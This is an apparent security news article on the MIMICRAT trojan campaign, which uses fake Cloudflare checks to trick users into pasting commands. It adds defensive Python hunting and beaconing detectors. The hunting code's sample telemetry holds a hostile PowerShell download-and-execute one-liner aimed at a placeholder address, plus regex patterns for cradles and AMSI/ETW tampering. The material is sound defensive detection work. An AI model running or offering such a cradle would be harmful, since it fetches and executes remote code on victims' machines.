Cybercriminals Exploit Compromised Websites to Deploy MIMICRAT Malware
Cybersecurity experts have recently uncovered a sophisticated cyberattack campaign that leverages compromised legitimate websites to distribute a newly identified remote access trojan (RAT) named MIMICRAT, also referred to as AstarionRAT. This campaign exemplifies a high degree of operational complexity, utilizing a multi-stage PowerShell sequence to bypass security mechanisms before deploying the malware.
Infection Mechanism:
The attack initiates through legitimate websites that have been infiltrated by cybercriminals. These sites are injected with malicious JavaScript code, which loads an externally hosted PHP script. This script presents visitors with a counterfeit Cloudflare verification page, instructing them to copy and paste a command into the Windows Run dialog to resolve a fabricated issue.
Executing this command triggers a PowerShell script that contacts a command-and-control (C2) server to retrieve a secondary PowerShell script. That second script disables Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI) to evade detection, then deploys a Lua-based loader. The loader decrypts and executes shellcode in memory, culminating in the installation of MIMICRAT.
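The infection chain above leaves a recognisable trail on the endpoint: text pasted into the Run dialog is recorded under Explorer's RunMRU registry key, the stager is a PowerShell process whose parent is explorer.exe and whose command line downloads and executes remote content, and the second stage references AMSI or ETW internals. The following hunting rule is an added example written for this article, not code from the researchers or from the campaign; the event schema, the RunMRU value text, the 203.0.113.10 address and every sample event are constructed for illustration.

```python
import re

# Constructed sample telemetry (not artefacts from the campaign). Field names
# loosely follow Sysmon event ID 1 (process create) and ID 13 (registry value
# set); the schema itself is an assumption made for this example.
SAMPLE_EVENTS = [
    # Text typed into the Run dialog is recorded under Explorer\RunMRU,
    # with a trailing "\1" appended by Explorer.
    {"id": 13, "host": "ws01", "ts": 100,
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows"
               r"\CurrentVersion\Explorer\RunMRU\a",
     "details": 'powershell -w hidden -c "iwr http://203.0.113.10/check.txt | iex"\\1'},
    # Stage 1: PowerShell launched from explorer.exe with a download cradle.
    {"id": 1, "host": "ws01", "ts": 101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://203.0.113.10/check.txt | iex"'},
    # Stage 2: child PowerShell whose command line references AMSI/ETW
    # internals (placeholder text stands in for the real script body).
    {"id": 1, "host": "ws01", "ts": 104,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -nop -w hidden -c "# placeholder stage-2 body touching '
                'AmsiScanBuffer and EtwEventWrite"'},
    # Benign: a user opening PowerShell from the Run dialog to list a folder.
    {"id": 1, "host": "ws02", "ts": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -c Get-ChildItem C:\Users"},
    # Benign: a scheduled inventory script, not launched from the Run dialog.
    {"id": 1, "host": "ws03", "ts": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
]

# Download-and-execute patterns typical of a one-line ClickFix stager.
CRADLE = re.compile(
    r"iwr|invoke-webrequest|downloadstring|invoke-expression|\biex\b|-enc(odedcommand)?\b",
    re.IGNORECASE)
# Strings that rarely belong in legitimate command lines: references to AMSI
# or ETW internals, or switching Defender features off.
TAMPER = re.compile(r"amsi|\betw\w*|eventwrite|set-mppreference\s+-disable", re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def run_dialog_history(events):
    """Collect (timestamp, typed text) per host from RunMRU registry writes."""
    history = {}
    for e in events:
        if e["id"] == 13 and "\\Explorer\\RunMRU\\" in e["target"]:
            typed = e["details"].removesuffix("\\1")
            history.setdefault(e["host"], []).append((e["ts"], typed))
    return history


def hunt(events, window=30):
    """Return findings for Run-dialog PowerShell cradles and defence tampering."""
    history = run_dialog_history(events)
    findings = []
    for e in events:
        if e["id"] != 1:
            continue
        cmd = e["cmdline"]
        from_run_dialog = (_basename(e["image"]) in ("powershell.exe", "pwsh.exe")
                           and _basename(e["parent"]) == "explorer.exe")
        if from_run_dialog and CRADLE.search(cmd):
            # A RunMRU entry carrying the same kind of cradle shortly before the
            # process start confirms the command was pasted into Win+R.
            corroborated = any(abs(e["ts"] - ts) <= window and CRADLE.search(typed)
                               for ts, typed in history.get(e["host"], []))
            findings.append({"rule": "clickfix_run_dialog", "host": e["host"], "ts": e["ts"],
                             "severity": "high" if corroborated else "medium", "cmdline": cmd})
        if TAMPER.search(cmd):
            findings.append({"rule": "defense_tampering", "host": e["host"], "ts": e["ts"],
                             "severity": "high", "cmdline": cmd})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']} on {f['host']} @ {f['ts']}: {f['cmdline']}")
```

Run against the constructed events, the rule fires twice on ws01 (the pasted cradle, raised to high severity because a matching RunMRU write precedes it, and the stage-2 tampering) and stays silent on the two benign PowerShell launches. The parent-process and RunMRU conditions are what keep the rule quiet on ordinary PowerShell use; a cradle regex alone would also flag the scheduled inventory script.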
Capabilities of MIMICRAT:
MIMICRAT is a custom C++ RAT equipped with features such as Windows token impersonation, SOCKS5 tunneling, and a suite of 22 commands facilitating extensive post-exploitation activities. The malware communicates with its C2 server over HTTPS, employing HTTP profiles that mimic legitimate web analytics traffic to avoid detection.
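Because the C2 traffic is shaped to look like web analytics requests, hostname or URL reputation alone gives little purchase; what an implant cannot easily hide is the regularity of its check-ins. The beaconing detector below is an added example written for this article, not the researchers' tooling and not derived from MIMICRAT samples. It parses a proxy log in a constructed format (epoch, source IP, host, path, bytes), groups requests per source-and-host pair, and flags pairs whose inter-request intervals have a low coefficient of variation; the hostnames, addresses and timestamps are all constructed.

```python
import statistics
from collections import defaultdict

# Constructed proxy log (not real traffic): "epoch src_ip host path bytes".
# Hostnames use the reserved .invalid TLD; addresses are private-range placeholders.
# 10.0.0.5 is a browser hitting a tracker at human-paced, irregular moments;
# 10.0.0.7 checks in roughly every 60 s; 10.0.0.9 has too few hits to judge.
SAMPLE_PROXY_LOG = """\
1700000000 10.0.0.5 analytics.example-cdn.invalid /collect?v=1&t=pageview 512
1700000003 10.0.0.5 analytics.example-cdn.invalid /collect?v=1&t=event 498
1700000045 10.0.0.5 analytics.example-cdn.invalid /collect?v=1&t=pageview 515
1700000120 10.0.0.5 analytics.example-cdn.invalid /collect?v=1&t=pageview 520
1700000121 10.0.0.5 analytics.example-cdn.invalid /collect?v=1&t=event 503
1700000500 10.0.0.5 analytics.example-cdn.invalid /collect?v=1&t=pageview 511
1700000505 10.0.0.5 analytics.example-cdn.invalid /collect?v=1&t=event 499
1700000000 10.0.0.7 stats.example-cdn.invalid /collect?v=1&t=pageview 1024
1700000058 10.0.0.7 stats.example-cdn.invalid /collect?v=1&t=pageview 1031
1700000121 10.0.0.7 stats.example-cdn.invalid /collect?v=1&t=pageview 1024
1700000180 10.0.0.7 stats.example-cdn.invalid /collect?v=1&t=pageview 1027
1700000242 10.0.0.7 stats.example-cdn.invalid /collect?v=1&t=pageview 1024
1700000300 10.0.0.7 stats.example-cdn.invalid /collect?v=1&t=pageview 1029
1700000361 10.0.0.7 stats.example-cdn.invalid /collect?v=1&t=pageview 1024
1700000010 10.0.0.9 stats.example-cdn.invalid /collect?v=1&t=pageview 700
1700000070 10.0.0.9 stats.example-cdn.invalid /collect?v=1&t=pageview 702
"""


def parse_log(text):
    """Yield (ts, src, host, path, size) tuples from the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, host, path, size = line.split()
        yield int(ts), src, host, path, int(size)


def find_beacons(records, min_hits=5, max_cv=0.2):
    """Flag (src, host) pairs whose request spacing is too regular for a human."""
    by_pair = defaultdict(list)
    for ts, src, host, _path, _size in records:
        by_pair[(src, host)].append(ts)
    hits = []
    for (src, host), stamps in by_pair.items():
        if len(stamps) < min_hits:       # not enough samples to judge regularity
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        cv = statistics.stdev(gaps) / mean   # coefficient of variation of the gaps
        if cv <= max_cv:
            hits.append({"src": src, "host": host, "hits": len(stamps),
                         "mean_interval": round(mean, 1), "cv": round(cv, 3)})
    return hits


if __name__ == "__main__":
    for h in find_beacons(parse_log(SAMPLE_PROXY_LOG)):
        print(f"possible beacon: {h['src']} -> {h['host']} every ~{h['mean_interval']}s "
              f"(cv={h['cv']}, n={h['hits']})")
```

On the constructed log only the 10.0.0.7 pair is reported (mean interval about 60 s, CV under 0.05); the genuine tracker traffic from 10.0.0.5 has a CV well above 1 and the two-request pair is skipped. Interval regularity is one signal, not a verdict: in practice it is combined with request-size uniformity, destination rarity across the fleet and the volume of data returned, and the thresholds are tuned against the organisation's own baseline.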
Global Reach and Localization:
The campaign demonstrates a broad geographical impact, with victims including a U.S.-based university and multiple Chinese-speaking users. The lure content is dynamically localized into 17 languages based on the victim’s browser settings, enhancing its effectiveness across diverse regions.
Connections to Other Campaigns:
Analyses indicate that this campaign shares tactical and infrastructural similarities with previous ClickFix campaigns, notably those involving the Matanbuchus 3.0 loader, which also deploys MIMICRAT. The ultimate objectives of these attacks are believed to be ransomware deployment or data exfiltration.
Implications and Recommendations:
This campaign underscores the evolving sophistication of cyber threats, particularly those exploiting trusted websites to disseminate malware. Organizations are advised to implement robust security measures, including regular monitoring of web assets, employee training on recognizing phishing tactics, and maintaining up-to-date security protocols to mitigate such risks.